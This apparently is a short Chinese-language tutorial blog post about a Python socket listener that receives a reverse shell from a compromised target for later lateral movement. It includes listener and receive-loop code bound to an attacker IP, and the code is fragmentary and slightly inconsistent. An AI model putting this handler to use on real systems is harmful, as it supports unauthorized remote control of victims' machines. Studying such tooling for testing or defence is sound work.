python脚本 拿到反弹shell后,横向移动
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
本篇的重要参考文献如下:
关于一次python获得完整交互式shell的研究:https://xz.aliyun.com/t/7721
使用方式
靶机:
攻击机:
使用socket 监听
socket接收反弹shell,建立链接
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
conn.bind(('10.200.9.6', port))
conn.listen(1)
使用子进程, 时刻反馈靶机的输出信息
talk, addr = conn.accept()
stdprint("Connect from %s.\n" % addr[0])
thread.start_new_thread(recv_daemon, (talk,))
recv_daemon(conn)函数
def recv_daemon(conn):
global CONN_ONLINE
while CONN_ONLINE:
try:
tmp = conn.recv(16)
if (tmp):
STDOUT.write(tmp)
stdout.flush()
else:
raise socket.error
except socket.error:
msg = "Connection close by socket.\n"
stdprint(msg)
close_socket(conn, 1)
关于一次python获得完整交互式shell的研究:https://xz.aliyun.com/t/7721 这篇博文中还包括实时交互的内容,可以参考。
查阅信息时,貌似pty库是解决这个问题了的,怎么用一直没get明白,有案例介绍的,欢迎评论区告诉我O(∩_∩)O